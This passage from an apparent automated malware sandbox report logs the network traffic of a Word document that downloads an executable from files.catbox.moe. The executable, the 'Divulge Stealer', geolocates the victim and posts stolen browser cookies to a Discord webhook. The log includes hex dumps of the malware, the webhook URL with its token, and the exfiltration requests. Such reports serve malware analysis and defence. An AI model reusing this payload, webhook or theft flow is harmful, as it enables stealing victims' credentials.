                                                                                    Nov 26, 2024 04:20:15.654553890 CET49809443192.168.2.4162.159.136.232
                                                                                    Nov 26, 2024 04:20:15.699338913 CET44349809162.159.136.232192.168.2.4
                                                                                    Nov 26, 2024 04:20:16.023257017 CET49809443192.168.2.4162.159.136.232
                                                                                    Nov 26, 2024 04:20:16.023278952 CET44349809162.159.136.232192.168.2.4
                                                                                    Nov 26, 2024 04:20:16.083112001 CET44349809162.159.136.232192.168.2.4
                                                                                    Nov 26, 2024 04:20:16.129501104 CET49809443192.168.2.4162.159.136.232
                                                                                    Nov 26, 2024 04:20:16.388029099 CET44349809162.159.136.232192.168.2.4
                                                                                    Nov 26, 2024 04:20:16.388101101 CET44349809162.159.136.232192.168.2.4
                                                                                    Nov 26, 2024 04:20:16.388159990 CET49809443192.168.2.4162.159.136.232
                                                                                    Nov 26, 2024 04:20:16.393764019 CET49809443192.168.2.4162.159.136.232
                                                                                    Nov 26, 2024 04:20:16.395684004 CET49810443192.168.2.4162.159.136.232
                                                                                    Nov 26, 2024 04:20:16.395725012 CET44349810162.159.136.232192.168.2.4
                                                                                    Nov 26, 2024 04:20:16.395802975 CET49810443192.168.2.4162.159.136.232
                                                                                    Nov 26, 2024 04:20:16.396262884 CET49810443192.168.2.4162.159.136.232
                                                                                    Nov 26, 2024 04:20:16.396281958 CET44349810162.159.136.232192.168.2.4
                                                                                    Nov 26, 2024 04:20:17.699485064 CET44349810162.159.136.232192.168.2.4
                                                                                    Nov 26, 2024 04:20:17.700983047 CET49810443192.168.2.4162.159.136.232
                                                                                    Nov 26, 2024 04:20:17.701046944 CET44349810162.159.136.232192.168.2.4
                                                                                    Nov 26, 2024 04:20:18.067101002 CET49810443192.168.2.4162.159.136.232
                                                                                    Nov 26, 2024 04:20:18.067153931 CET44349810162.159.136.232192.168.2.4
                                                                                    Nov 26, 2024 04:20:18.067399979 CET49810443192.168.2.4162.159.136.232
                                                                                    Nov 26, 2024 04:20:18.067437887 CET44349810162.159.136.232192.168.2.4
                                                                                    Nov 26, 2024 04:20:18.067675114 CET49810443192.168.2.4162.159.136.232
                                                                                    Nov 26, 2024 04:20:18.067712069 CET44349810162.159.136.232192.168.2.4
                                                                                    Nov 26, 2024 04:20:18.067784071 CET49810443192.168.2.4162.159.136.232
                                                                                    Nov 26, 2024 04:20:18.067817926 CET44349810162.159.136.232192.168.2.4
                                                                                    Nov 26, 2024 04:20:18.152555943 CET44349810162.159.136.232192.168.2.4
                                                                                    Nov 26, 2024 04:20:18.207365990 CET49810443192.168.2.4162.159.136.232
                                                                                    Nov 26, 2024 04:20:18.771912098 CET44349810162.159.136.232192.168.2.4
                                                                                    Nov 26, 2024 04:20:18.771986008 CET44349810162.159.136.232192.168.2.4
                                                                                    Nov 26, 2024 04:20:18.772047997 CET49810443192.168.2.4162.159.136.232
                                                                                    Nov 26, 2024 04:20:18.772659063 CET49810443192.168.2.4162.159.136.232

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Nov 26, 2024 04:19:28.599843025 CET6458253192.168.2.41.1.1.1
                                                                                    Nov 26, 2024 04:19:28.904349089 CET53645821.1.1.1192.168.2.4
                                                                                    Nov 26, 2024 04:19:49.502362013 CET5307153192.168.2.41.1.1.1
                                                                                    Nov 26, 2024 04:19:49.641283035 CET53530711.1.1.1192.168.2.4
                                                                                    Nov 26, 2024 04:20:14.244008064 CET5147053192.168.2.41.1.1.1
                                                                                    Nov 26, 2024 04:20:14.382805109 CET53514701.1.1.1192.168.2.4

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Nov 26, 2024 04:19:28.599843025 CET192.168.2.41.1.1.10xf915Standard query (0)files.catbox.moeA (IP address)IN (0x0001)false
                                                                                    Nov 26, 2024 04:19:49.502362013 CET192.168.2.41.1.1.10xfa1cStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                    Nov 26, 2024 04:20:14.244008064 CET192.168.2.41.1.1.10x5d89Standard query (0)discord.comA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Nov 26, 2024 04:19:28.904349089 CET1.1.1.1192.168.2.40xf915No error (0)files.catbox.moe108.181.20.35A (IP address)IN (0x0001)false
                                                                                    Nov 26, 2024 04:19:41.974294901 CET1.1.1.1192.168.2.40x89e0No error (0)templatesmetadata.office.nettemplatesmetadata.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                    Nov 26, 2024 04:19:49.641283035 CET1.1.1.1192.168.2.40xfa1cNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                    Nov 26, 2024 04:20:14.382805109 CET1.1.1.1192.168.2.40x5d89No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                    Nov 26, 2024 04:20:14.382805109 CET1.1.1.1192.168.2.40x5d89No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                    Nov 26, 2024 04:20:14.382805109 CET1.1.1.1192.168.2.40x5d89No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                    Nov 26, 2024 04:20:14.382805109 CET1.1.1.1192.168.2.40x5d89No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                    Nov 26, 2024 04:20:14.382805109 CET1.1.1.1192.168.2.40x5d89No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • files.catbox.moe
                                                                                    • discord.com
                                                                                    • ip-api.com

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.449803208.95.112.1807916C:\7037005\vhcst.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 26, 2024 04:19:49.765615940 CET79OUTGET /json/?fields=225545 HTTP/1.1
                                                                                    Host: ip-api.com
                                                                                    Connection: Keep-Alive
                                                                                    Nov 26, 2024 04:19:50.923795938 CET379INHTTP/1.1 200 OK
                                                                                    Date: Tue, 26 Nov 2024 03:19:49 GMT
                                                                                    Content-Type: application/json; charset=utf-8
                                                                                    Content-Length: 202
                                                                                    Access-Control-Allow-Origin: *
                                                                                    X-Ttl: 60
                                                                                    X-Rl: 44
                                                                                    Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 37 35 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 7d
                                                                                    Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-75.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.75"}


                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.449735108.181.20.354437364C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-26 03:19:30 UTC310OUTGET /b5uubc.zip HTTP/1.1
                                                                                    Accept: */*
                                                                                    Accept-Language: en-ch
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                    Host: files.catbox.moe
                                                                                    Connection: Keep-Alive
                                                                                    2024-11-26 03:19:31 UTC541INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Tue, 26 Nov 2024 03:19:30 GMT
                                                                                    Content-Type: application/zip
                                                                                    Content-Length: 83519
                                                                                    Last-Modified: Mon, 25 Nov 2024 12:48:46 GMT
                                                                                    Connection: close
                                                                                    ETag: "6744722e-1463f"
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self';
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                    Accept-Ranges: bytes
                                                                                    2024-11-26 03:19:31 UTC15843INData Raw: 50 4b 03 04 14 00 00 00 08 00 71 25 79 59 19 ea a6 7f a7 45 01 00 00 78 03 00 09 00 00 00 76 68 63 73 74 2e 65 78 65 ec 7d 79 9c 14 d5 b5 7f 75 55 75 f5 3e 33 d5 dd d3 3d 7b 0f cb 0c 65 77 cf b0 0c e8 00 ca ee 86 2b 8a 3a 08 b8 a0 a8 44 a0 b0 9a 41 a5 e9 11 f7 0d 50 83 9a 48 62 a2 44 93 68 8c 1a 13 e3 16 35 46 8d 79 89 26 83 89 26 6a 18 b7 3c cd ee 33 9a 97 bc 2c f0 ce 72 ab ba 6a 18 3a 3d fe f1 f2 fb e3 c7 87 ea 7b ee b9 e7 dc ef b9 e7 ee b5 dc 39 e6 d4 1b 25 45 92 24 15 ae bd 7b 25 e9 51 89 ff cd 91 fe f5 bf cd 70 d5 64 1e af 91 be 15 7a 69 cc a3 be a3 5f 1a b3 f8 bc 55 85 f6 75 96 79 ae 75 e6 9a f6 b3 ce 5c bb d6 5c df be 62 65 bb d5 bf b6 7d d5 da f6 05 c7 9d d8 be c6 3c 7b 65 77 2c 16 1e 2f f2 38 fe 50 49 3a da a7 48 ea ed b7 fc d9 ce f7 2d 69 ac 2f
                                                                                    Data Ascii: PKq%yYExvhcst.exe}yuUu>3={ew+:DAPHbDh5Fy&&j<3,rj:={9%E${%Qpdzi_Uuyu\\be}<{ew,/8PI:H-i/
                                                                                    2024-11-26 03:19:31 UTC16384INData Raw: 55 16 75 8a 5e 65 51 66 5d 08 95 91 bb 8c a2 4a 37 7a 15 b1 b2 2f 06 2a 8b 5a 03 b8 cb 88 ea 9a 68 f9 3a 38 0e d7 c8 db 2a e2 1b 60 ca 9d f0 7a 66 0d f6 0c 06 37 7a c1 9b bc 60 de 0b de 0c 41 9b fa cc 6b 8c 19 86 f3 99 5a 5e 61 b2 50 1a e2 c1 2f b9 4a 7e c9 55 bf bf 09 61 92 78 9b 30 49 bc cd 6f 92 78 1b d9 b7 c6 c0 fa 70 ab db 05 66 cc 67 94 e8 81 3d fb 56 85 ce e4 28 ef 71 65 64 6a d4 f3 2f 01 36 89 13 f9 5f 2d 87 cd 8e 0e b6 49 bc 8c c3 ae 8d 06 ec 5b 6f 2d b5 6f b5 42 8a b2 1a 75 bd 1d a8 eb 2d e6 71 65 3b ff 7b 89 ff dd c7 6b e8 de 8d 87 ac 6d 98 c4 38 a0 30 32 bc d0 cc b9 1d 83 60 d5 e0 7c 19 82 85 33 f8 57 68 e8 e6 48 c5 9c 5d a8 1d df 05 fa 28 e3 71 eb 22 58 ed fe 44 68 79 9f 7a 5a de 0e d2 f2 ee c0 36 ef 14 5a de 52 a0 86 fb d1 e8 fc 0e d2 f2 ee
                                                                                    Data Ascii: Uu^eQf]J7z/*Zh:8*`zf7z`AkZ^aP/J~Uax0Ioxpfg=V(qedj/6_-I[o-oBu-qe;{km802`|3WhH](q"XDhyzZ6ZR
                                                                                    2024-11-26 03:19:31 UTC16384INData Raw: 8d 7b 88 7f f7 f0 60 cb fc 58 66 6c 35 7a 57 e3 0f d8 26 e5 0c bb 89 95 61 7d 9d dd 84 b3 f8 0f ce 62 e1 ec f1 07 67 8f 16 67 e2 04 5a f0 72 4c 8e 35 98 59 a1 7c db f5 e3 db 25 5d 44 92 46 4b 6f 0a 80 58 18 06 06 30 d3 d7 34 0b f8 43 51 ff b2 22 a2 bc 96 d3 73 00 d3 b2 53 d3 53 b3 d2 b3 32 72 f1 8c 1f 5b 3b 37 eb 01 3c b5 00 55 8f 02 5c ee 47 ed fe d5 f2 f8 49 e3 a6 62 8b c1 f4 4d b8 a1 2b 3d 37 a0 3f 9c 8b 20 80 af 9e 9e ee 03 4a 8b e9 f1 67 ca c7 f2 29 17 4d 9c 3c aa a5 36 f4 12 0f 7a f7 f9 42 7f dc b5 7e 23 59 e0 dc 03 84 ff 26 b0 8b fe 73 17 7d 4f 5c 43 1b 7d 4b 4f 0e a0 5c 43 6d 3b 3d be c3 7f 1b 97 94 7b 88 e6 0e d0 91 fe 33 41 f9 7b 30 d8 79 ba 55 80 3f b7 09 b7 17 f1 ef 8d 6f 58 f4 2b d1 ca 4c 75 30 36 63 75 9c 0e 56 b5 45 8d 48 5f 9e ac 83 e1 ed
                                                                                    Data Ascii: {`Xfl5zW&a}bggZrL5Y|%]DFKoX04CQ"sSS2r[;7<U\GIbM+=7? Jg)M<6zB~#Y&s}O\C}KO\Cm;={3A{0yU?oX+Lu06cuVEH_
                                                                                    2024-11-26 03:19:31 UTC16384INData Raw: fa 40 b8 a4 f2 81 68 c9 a4 07 93 24 c5 0f 66 4b 7e 06 d0 99 93 24 b1 9e 53 21 79 1e 20 62 4e 88 24 15 60 60 4e b8 64 d9 dc 68 c9 89 b9 49 92 8f e6 66 4b da 00 ee 00 fd db dc 0a 89 de bc 0a c9 94 79 21 92 87 00 fe 35 2f 5c f2 f6 bc 68 89 f9 43 49 12 9f 87 b2 25 cf 03 44 00 9d f4 50 85 24 1b e0 e2 43 21 92 6b 00 13 e7 87 4b 5c e7 47 4b ca e6 27 49 7e 9d 9f 2d d1 5b 90 2d 99 b2 20 49 32 7b 41 85 c4 02 e0 e1 05 21 92 8d 00 d9 0b c2 25 fd 0b a2 25 4b 16 26 49 c2 16 66 4b e2 00 32 80 3e bf b0 42 72 05 e0 fa c2 10 c9 47 00 8b 17 85 4b 42 17 45 4b 3e 5c 94 24 99 b3 38 5b 62 03 e0 b4 38 49 b2 7e 71 85 e4 19 00 8f c5 21 92 e3 00 9f 2f 0e 97 2c b4 88 96 bc 60 91 24 79 dd 22 5b f2 11 40 1b d0 77 2c 2a 24 bf 02 e8 59 86 48 cc 00 7c 2d c3 25 75 96 d1 12 3d ab 24 c9 36
                                                                                    Data Ascii: @h$fK~$S!y bN$``NdhIfKy!5/\hCI%DP$C!kK\GK'I~-[- I2{A!%%K&IfK2>BrGKBEK>\$8[b8I~q!/,`$y"[@w,*$YH|-%u=$6
                                                                                    2024-11-26 03:19:31 UTC16384INData Raw: 31 e1 de ba d2 7a 54 ef ae cc c9 83 f0 cf 1c 97 50 ba eb 58 4c 56 21 76 42 2f 9a 1e 2a 90 49 33 d5 b9 fc 70 87 84 9b e4 49 52 74 8e fc 51 fd d5 2d 1a ce c7 52 f3 89 82 2b ab ed 8b 87 04 dc 1b 73 ee dc 97 e8 4b 51 42 f8 06 ea fe 2d a0 64 6b 51 e6 b4 ff c2 fd 86 39 28 3a 59 b9 9e 5f 8d a4 c4 7c d0 3d 87 c1 e5 ac 05 bb 49 57 f5 d8 af 52 39 b9 cf 3a f1 fb ba 85 fc b9 7c 20 7f e6 ee 86 12 57 2d f5 e6 c4 7d 58 1d 9c e4 55 6b a2 02 7f 2d d9 8f 7f a3 4b 57 45 a2 1f a0 2e 4f c4 73 01 a8 4b b3 0d a6 d9 1a b2 89 73 9c 0c bd f8 23 01 2f 7c f3 4d c4 0f c1 12 fe 10 be 7b dd 87 fd 09 18 74 10 a2 72 36 dd 07 9d 82 6b 9c 4d ee 70 64 31 d9 8f fb c1 c5 fc 78 50 47 76 31 59 ce 1d 71 4c e5 4e bc 55 ef 42 76 12 f5 ed 05 a3 c0 21 0e 11 99 ae 6a c7 5f fd 3b d1 52 de 15 27 5a 78
                                                                                    Data Ascii: 1zTPXLV!vB/*I3pIRtQ-R+sKQB-dkQ9(:Y_|=IWR9:| W-}XUk-KWE.OsKs#/|M{tr6kMpd1xPGv1YqLNUBv!j_;R'Zx
                                                                                    2024-11-26 03:19:31 UTC2140INData Raw: e7 16 85 bf ab 5c 06 dd f1 1f 45 3e 77 d5 9d ff d4 f6 f0 ba c3 c9 65 d2 df 4e 2e f5 fc 9d fb a1 9f 81 e0 e4 33 f9 7f dc f6 fc 6d e5 f2 8c c9 a0 cf 24 d4 0d d1 9d 46 e9 03 6c f3 a5 33 6a 68 ba 74 06 bf 9b 69 24 f9 7c 76 31 8e fd a2 22 59 0d b5 ff 98 f3 bb b6 e7 ef 2a 97 86 67 87 7e d6 c1 64 90 ee bc 1d b9 63 58 99 57 0f 3d 36 cc f6 d0 ef bc 1d fa f7 d6 71 d7 df 9d 5b 7f 5b b9 ec 98 3a 4c 36 42 f9 7c 51 16 3f ac cc ad ec 17 86 cd ad 77 13 bd 85 59 d4 df b1 75 37 db f3 f7 96 8b e6 b3 25 c3 e4 f3 b4 09 7e 37 ae ea 8f 7e 96 81 fe d1 ef cd 1f 6a 7b 5a eb f3 04 f9 7e c2 e7 97 9f be f3 bb b6 e7 6f 2b 97 e7 a6 71 30 82 7c e8 6f 07 d0 3b fa f4 8f 7e ef 1a bd f3 ce e2 67 35 bb 86 ad 5b f4 7b c8 84 9f 25 62 79 39 d6 3c 6b 7e d7 75 fd ef 2a 97 41 f7 50 87 c8 e7 cd 23
                                                                                    Data Ascii: \E>weN.3m$Fl3jhti$|v1"Y*g~dcXW=6q[[:L6B|Q?wYu7%~7~j{Z~o+q0|o;~g5[{%by9<k~u*AP#


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.449809162.159.136.2324437916C:\7037005\vhcst.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-26 03:20:15 UTC360OUTPOST /api/webhooks/1307747947399741462/ke8UE548A61Hf_m1cpanGTjUrsXfghQotpegEAB6XvUfFSq5b5Q9claDeBbFwCxoUc2f HTTP/1.1
                                                                                    Accept: application/json
                                                                                    User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                                                                    Content-Type: application/json; charset=utf-8
                                                                                    Host: discord.com
                                                                                    Content-Length: 885
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    2024-11-26 03:20:16 UTC885OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 22 2c 22 65 6d 62 65 64 73 22 3a 5b 7b 22 74 69 74 6c 65 22 3a 22 44 69 76 75 6c 67 65 20 53 74 65 61 6c 65 72 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 2a 2a 5f 5f f0 9f 93 a1 4e 65 74 77 6f 72 6b 20 61 64 64 72 65 73 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 5f 5f 2a 2a 5c 6e 60 60 60 70 72 6f 6c 6f 67 5c 6e 49 50 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 5c 6e 5c 6e 43 6f 75 6e 74 72 79 3a 20 55 6e 69 74 65 64 20 53 74 61 74 65 73 5c 6e 52 65 67 69 6f 6e 3a 20 4e 65 77 20 59 6f 72 6b 5c 6e 54 69 6d 65 7a 6f 6e 65 3a 20 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 5c 6e 5c 6e 43 65 6c 6c 75 6c 61 72 20 44 61 74 61 3a 20 e2 9d 8e 5c 6e 50 72 6f 78 79 2f 56 50 4e 3a 20 20 20 20 20 e2 9d 8e 5c 6e 5c 6e 60 60 60 5c
                                                                                    Data Ascii: {"content":"","embeds":[{"title":"Divulge Stealer","description":"**__Network address information__**\n```prolog\nIP: 8.46.123.75\n\nCountry: United States\nRegion: New York\nTimezone: America/New_York\n\nCellular Data: \nProxy/VPN: \n\n```\
                                                                                    2024-11-26 03:20:16 UTC25INHTTP/1.1 100 Continue
                                                                                    2024-11-26 03:20:16 UTC1300INHTTP/1.1 404 Not Found
                                                                                    Date: Tue, 26 Nov 2024 03:20:16 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 45
                                                                                    Connection: close
                                                                                    Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                    x-ratelimit-limit: 5
                                                                                    x-ratelimit-remaining: 4
                                                                                    x-ratelimit-reset: 1732591217
                                                                                    x-ratelimit-reset-after: 1
                                                                                    via: 1.1 google
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7GSBH09IdxaaBiw1VR7CuhccLRNDUwKSFPNHw24%2B41Md4lfiOqYYyQJGscUro%2Bxy%2FaYjZpNmdv6NrRunjZzvUkYcr6BzAMgOrLIK4g8x0gyowmeQlta3ssNTWBYk"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Set-Cookie: __cfruid=64cd4db9c25784106b9f40645da79d12cd6a52ca-1732591216; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                    Set-Cookie: _cfuvid=93OUJmd_xmOIVIokl09v3nXuiN54N5ZOLQSYpDItJMI-1732591216230-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8e86bddb88a05e79-EWR
                                                                                    {"message": "Unknown Webhook", "code": 10015}


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.449810162.159.136.2324437916C:\7037005\vhcst.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-26 03:20:17 UTC530OUTPOST /api/webhooks/1307747947399741462/ke8UE548A61Hf_m1cpanGTjUrsXfghQotpegEAB6XvUfFSq5b5Q9claDeBbFwCxoUc2f HTTP/1.1
                                                                                    Accept: application/json
                                                                                    User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                                                                    Content-Type: multipart/form-data; boundary="32b3d4ff-20c5-4b2d-a746-f64fcbcb2dcb"
                                                                                    Host: discord.com
                                                                                    Cookie: __cfruid=64cd4db9c25784106b9f40645da79d12cd6a52ca-1732591216; _cfuvid=93OUJmd_xmOIVIokl09v3nXuiN54N5ZOLQSYpDItJMI-1732591216230-0.0.1.1-604800000
                                                                                    Content-Length: 44937
                                                                                    Expect: 100-continue
                                                                                    2024-11-26 03:20:18 UTC40OUTData Raw: 2d 2d 33 32 62 33 64 34 66 66 2d 32 30 63 35 2d 34 62 32 64 2d 61 37 34 36 2d 66 36 34 66 63 62 63 62 32 64 63 62 0d 0a
                                                                                    Data Ascii: --32b3d4ff-20c5-4b2d-a746-f64fcbcb2dcb
                                                                                    2024-11-26 03:20:18 UTC142OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 44 69 76 75 6c 67 65 2d 39 38 30 31 30 38 2e 7a 69 70 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 44 69 76 75 6c 67 65 2d 39 38 30 31 30 38 2e 7a 69 70 0d 0a 0d 0a
                                                                                    Data Ascii: Content-Type: application/zipContent-Disposition: form-data; name=file; filename=Divulge-980108.zip; filename*=utf-8''Divulge-980108.zip
                                                                                    2024-11-26 03:20:18 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 08 08 00 78 b2 79 59 7b ff df 9a dd 06 00 00 11 0d 00 00 23 00 00 00 42 72 6f 77 73 65 72 73 2f 43 6f 6f 6b 69 65 73 2f 43 68 72 6f 6d 65 20 43 6f 6f 6b 69 65 73 2e 74 78 74 c5 57 4b 8f 9b c8 1a 5d 13 29 7f 23 1b 8b 6e 8a aa 82 aa 45 2f 78 fb 81 6d 0c 7e 6f 5a 80 0b 1b 83 c1 3c 0c b6 35 ca 6f bf b4 33 c9 24 52 6e d2 d1 2c 86 05 08 89 3a 75 be c7 39 5f f1 b4 cf f3 7d ca 9e c2 fc c4 cd dd 85 c1 3d 73 a6 62 7b 06 07 20 c4 92 04 88 24 40 89 48 80 42 6e 32 d0 39 0c c0 cb 91 78 b3 c5 3c ad b3 e5 02 87 53 85 dd ee 85 77 5d f1 45 7f ea 27 ee 45 ed eb 33 cb 9e 5b 2c 64 1a dd e2 d2 bd 27 b8 2e c7 a3 00 69 97 ad f6 aa 99 a7 50 1e 99 ed 2c 74 87 36 5f 58 77 32 6e 92 e4 3e de 9e 8c b4 59 2b e6 ca 9e f2 73 67 4b 9d 71 a1 6e 14 99 6c 95 8b cf ce d9
                                                                                    Data Ascii: PKxyY{#Browsers/Cookies/Chrome Cookies.txtWK])#nE/xm~oZ<5o3$Rn,:u9_}=sb{ $@HBn29x<Sw]E'E3[,d'.iP,t6_Xw2n>Y+sgKqnl
                                                                                    2024-11-26 03:20:18 UTC16355OUTData Raw: 4e b0 d7 3f be 59 b8 cb 65 43 a3 a3 5b bb 2f 5a 2e c2 b9 f9 21 f7 f1 af 28 a8 01 cf 69 24 79 d2 2c ac fd 34 8e 74 19 51 1a cc e4 18 ec 62 11 bd 50 92 f9 1a 51 0e b3 03 c1 3b 48 d7 2d c5 21 56 e7 72 96 59 31 14 53 a2 fc e0 78 82 ae 48 b7 55 e6 9f 7a d2 2c 27 26 7c 14 ad a5 d8 bf 98 49 5e 33 78 0d 4b ff c3 3b 5e d2 f6 2f 5a 12 35 be c5 f7 0e 85 2a 79 89 fb c0 1b e6 13 f3 82 f6 53 e9 88 a7 d3 17 96 ba 3c ea 09 0c a1 47 91 91 fe f0 d2 40 44 8f f7 04 eb db 70 9c e8 c9 84 3e 79 f1 f9 44 b0 ab d0 b2 0e 83 d8 3f 40 f7 5c ff 8a ad 52 c1 70 2e ca 02 f8 81 aa 1a 1c 73 77 0b 83 51 bd 11 6f f0 51 68 38 7b 29 c0 77 4f 8d 19 8c 6d 4b df fd fb c5 d9 f4 c6 31 7e c9 5a 53 30 98 e4 4b 4b b1 7e 8a cd 44 a9 84 d4 32 44 ef be 61 3c 13 df 87 d5 ae ed 8f d3 7f 13 7e 93 89 37 38
                                                                                    Data Ascii: N?YeC[/Z.!(i$y,4tQbPQ;H-!VrY1SxHUz,'&|I^3xK;^/Z5*yS<G@Dp>yD?@\Rp.swQoQh8{)wOmK1~ZS0KK~D2Da<~78
                                                                                    2024-11-26 03:20:18 UTC12001OUTData Raw: db 70 90 d2 d4 da 58 b0 24 0d 37 a0 64 1d a4 e0 91 9b c4 38 24 d5 21 36 db bc 91 5b 7c 85 ba 53 6f e6 cf 8e fe 23 70 5f 44 e1 6b 83 27 05 30 ae 8c 45 d8 91 93 22 35 e9 db ed 09 fb 1e 69 2f 2d dc 03 ee b7 81 1f 51 56 bd 13 4d b9 89 19 f2 15 ce bd f8 e9 97 f1 0e 01 e5 55 bb 7f 77 cd 6c 46 26 3d 1f 38 7f be e3 e6 bd da 35 d5 a7 15 7f a8 ec aa cc 9d 97 49 5e 4b 7e 0b f9 f2 d2 72 af c7 d1 2f 2f 50 4f 76 9f 79 14 2a 34 47 87 71 8f ca 45 68 a2 a9 73 67 85 bb 9e 06 d6 d8 3e 9f b4 cc 3b 3c 93 eb fd 87 1a 63 bc 69 e7 87 ee 1a 16 da 14 e9 58 bf a3 f7 a4 cc bd ec 0d 13 bb 9a 85 1b f2 fa 77 ae 7d 8b d1 ff 25 58 5b 4c d7 38 3a 51 8e b4 23 2e d0 2e e9 45 a0 0f 6a d7 89 76 25 ad 8a 28 43 e9 88 fa 44 2c 60 61 f7 54 85 2f b3 c2 25 ab ca e8 30 ef 89 6e 8e 8c b2 5b d2 ff cc
                                                                                    Data Ascii: pX$7d8$!6[|So#p_Dk'0E"5i/-QVMUwlF&=85I^K~r//POvy*4GqEhsg>;<ciXw}%X[L8:Q#..Ejv%(CD,`aT/%0n[
                                                                                    2024-11-26 03:20:18 UTC44OUTData Raw: 0d 0a 2d 2d 33 32 62 33 64 34 66 66 2d 32 30 63 35 2d 34 62 32 64 2d 61 37 34 36 2d 66 36 34 66 63 62 63 62 32 64 63 62 2d 2d 0d 0a
                                                                                    Data Ascii: --32b3d4ff-20c5-4b2d-a746-f64fcbcb2dcb--
                                                                                    2024-11-26 03:20:18 UTC25INHTTP/1.1 100 Continue
                                                                                    2024-11-26 03:20:18 UTC1007INHTTP/1.1 404 Not Found
                                                                                    Date: Tue, 26 Nov 2024 03:20:18 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 45
                                                                                    Connection: close
                                                                                    Cache-Control: public, max-age=3600, s-maxage=3600
